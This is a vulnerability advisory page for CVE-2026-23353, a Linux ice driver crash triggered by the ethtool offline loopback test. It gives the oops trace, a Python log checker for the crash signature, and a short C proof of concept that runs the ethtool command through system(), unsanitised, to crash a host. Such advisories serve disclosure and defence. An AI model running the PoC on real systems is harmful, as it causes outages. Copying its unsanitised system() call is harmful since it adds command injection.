Security Vulnerability Report
CVE-2026-23353 CVSS 5.5 MEDIUM

CVE-2026-23353

Published: 2026-03-25 11:16:34
Last Modified: 2026-04-24 17:45:53
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ice: fix crash in ethtool offline loopback test

Since the conversion of ice to page pool, the ethtool loopback test crashes:

    BUG: kernel NULL pointer dereference, address: 000000000000000c
    #PF: supervisor write access in kernel mode
    #PF: error_code(0x0002) - not-present page
    PGD 1100f1067 P4D 0
    Oops: Oops: 0002 [#1] SMP NOPTI
    CPU: 23 UID: 0 PID: 5904 Comm: ethtool Kdump: loaded Not tainted 6.19.0-0.rc7.260128g1f97d9dcf5364.49.eln154.x86_64 #1 PREEMPT(lazy)
    Hardware name: [...]
    RIP: 0010:ice_alloc_rx_bufs+0x1cd/0x310 [ice]
    Code: 83 6c 24 30 01 66 41 89 47 08 0f 84 c0 00 00 00 41 0f b7 dc 48 8b 44 24 18 48 c1 e3 04 41 bb 00 10 00 00 48 8d 2c 18 8b 04 24 <89> 45 0c 41 8b 4d 00 49 d3 e3 44 3b 5c 24 24 0f 83 ac fe ff ff 44
    RSP: 0018:ff7894738aa1f768 EFLAGS: 00010246
    RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
    RDX: 0000000000000000 RSI: 0000000000000700 RDI: 0000000000000000
    RBP: 0000000000000000 R08: ff16dcae79880200 R09: 0000000000000019
    R10: 0000000000000001 R11: 0000000000001000 R12: 0000000000000000
    R13: 0000000000000000 R14: 0000000000000000 R15: ff16dcae6c670000
    FS: 00007fcf428850c0(0000) GS:ff16dcb149710000(0000) knlGS:0000000000000000
    CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 000000000000000c CR3: 0000000121227005 CR4: 0000000000773ef0
    PKRU: 55555554
    Call Trace:
     <TASK>
     ice_vsi_cfg_rxq+0xca/0x460 [ice]
     ice_vsi_cfg_rxqs+0x54/0x70 [ice]
     ice_loopback_test+0xa9/0x520 [ice]
     ice_self_test+0x1b9/0x280 [ice]
     ethtool_self_test+0xe5/0x200
     __dev_ethtool+0x1106/0x1a90
     dev_ethtool+0xbe/0x1a0
     dev_ioctl+0x258/0x4c0
     sock_do_ioctl+0xe3/0x130
     __x64_sys_ioctl+0xb9/0x100
     do_syscall_64+0x7c/0x700
     entry_SYSCALL_64_after_hwframe+0x76/0x7e
    [...]

It crashes because we have not initialized libeth for the rx ring.

Fix it by treating ICE_VSI_LB VSIs slightly more like normal PF VSIs and letting them have a q_vector. It's just a dummy, because the loopback test does not use interrupts, but it contains a napi struct that can be passed to libeth_rx_fq_create() called from ice_vsi_cfg_rxq() -> ice_rxq_pp_create().
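
A log check for the crash signature in the trace above, added here as an example and not part of the CVE record or the kernel patch: it flags a NULL-dereference oops whose faulting function is `ice_alloc_rx_bufs` in the `ice` module and whose call trace passes through `ice_loopback_test` and `ethtool_self_test`. The function name `find_ice_loopback_oops`, the timestamps and the second, non-matching oops are constructed for illustration.

```python
import re

# Constructed input: oops lines copied from the description, with made-up
# timestamps, followed by an unrelated constructed oops that must not match.
SAMPLE_LOG = """\
[ 100.000001] BUG: kernel NULL pointer dereference, address: 000000000000000c
[ 100.000002] CPU: 23 UID: 0 PID: 5904 Comm: ethtool Kdump: loaded Not tainted 6.19.0-0.rc7.260128g1f97d9dcf5364.49.eln154.x86_64 #1 PREEMPT(lazy)
[ 100.000003] RIP: 0010:ice_alloc_rx_bufs+0x1cd/0x310 [ice]
[ 100.000004] Call Trace:
[ 100.000005]  <TASK>
[ 100.000006]  ice_vsi_cfg_rxq+0xca/0x460 [ice]
[ 100.000007]  ice_vsi_cfg_rxqs+0x54/0x70 [ice]
[ 100.000008]  ice_loopback_test+0xa9/0x520 [ice]
[ 100.000009]  ice_self_test+0x1b9/0x280 [ice]
[ 100.000010]  ethtool_self_test+0xe5/0x200
[ 200.000001] BUG: kernel NULL pointer dereference, address: 0000000000000010
[ 200.000002] CPU: 1 UID: 0 PID: 77 Comm: kworker/1:1 Not tainted 6.19.0 #1
[ 200.000003] RIP: 0010:example_fn+0x10/0x40 [example_mod]
[ 200.000004] Call Trace:
[ 200.000005]  example_caller+0x20/0x80 [example_mod]
"""

STAMP = re.compile(r"^\[\s*\d+\.\d+\]\s?")
BUG = re.compile(r"BUG: kernel NULL pointer dereference, address: ([0-9a-f]+)")
RIP = re.compile(r"RIP: [0-9a-f]+:(\w+)\+0x[0-9a-f]+/0x[0-9a-f]+(?: \[(\w+)\])?")
FRAME = re.compile(r"^\s*\??\s*(\w+)\+0x[0-9a-f]+/0x[0-9a-f]+")
COMM = re.compile(r"Comm: (\S+)")

def find_ice_loopback_oops(log):
    """Return one dict per oops whose faulting function and call path match the trace above."""
    reports, cur = [], None
    for raw in log.splitlines():
        line = STAMP.sub("", raw)          # drop the dmesg timestamp, if any
        if m := BUG.search(line):          # a new oops report starts here
            cur = {"address": m.group(1), "comm": None, "rip": None, "frames": []}
            reports.append(cur)
        elif cur is None:
            continue                       # ignore lines before the first oops
        elif m := RIP.search(line):
            cur["rip"] = (m.group(1), m.group(2))
        elif m := COMM.search(line):
            cur["comm"] = m.group(1)
        elif m := FRAME.match(line):       # call-trace entry: symbol+off/size
            cur["frames"].append(m.group(1))
    return [r for r in reports
            if r["rip"] == ("ice_alloc_rx_bufs", "ice")
            and {"ice_loopback_test", "ethtool_self_test"} <= set(r["frames"])]
```
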

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < commit 85c98b81849e4724ae99005a6cccd33cab9cfd18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23353
 * Trigger: Execute ethtool offline loopback test on vulnerable ice driver.
 * Impact: Kernel NULL pointer dereference leading to system crash (DoS).
 * Compile: gcc -o poc_cve_2026_23353 poc_cve_2026_23353.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char cmd[256];
    char interface[32];

    if (argc < 2) {
        printf("Usage: %s <interface_name>\n", argv[0]);
        printf("Example: %s eth0\n", argv[0]);
        return 1;
    }

    /* Copy the interface name with explicit NUL termination. */
    strncpy(interface, argv[1], sizeof(interface) - 1);
    interface[sizeof(interface) - 1] = '\0';

    printf("[+] Attempting to trigger CVE-2026-23353 on interface: %s\n", interface);
    printf("[+] Executing offline loopback test...\n");

    /* The vulnerability is triggered by the offline self-test which calls ice_loopback_test */
    snprintf(cmd, sizeof(cmd), "/sbin/ethtool -t %s offline", interface);

    /* Execute the command. This will cause a kernel Oops/panic on vulnerable systems. */
    int ret = system(cmd);
    if (ret == -1) {
        perror("system failed");
        return 1;
    }

    printf("[+] Command executed. If the system crashes, the vulnerability is present.\n");
    return 0;
}

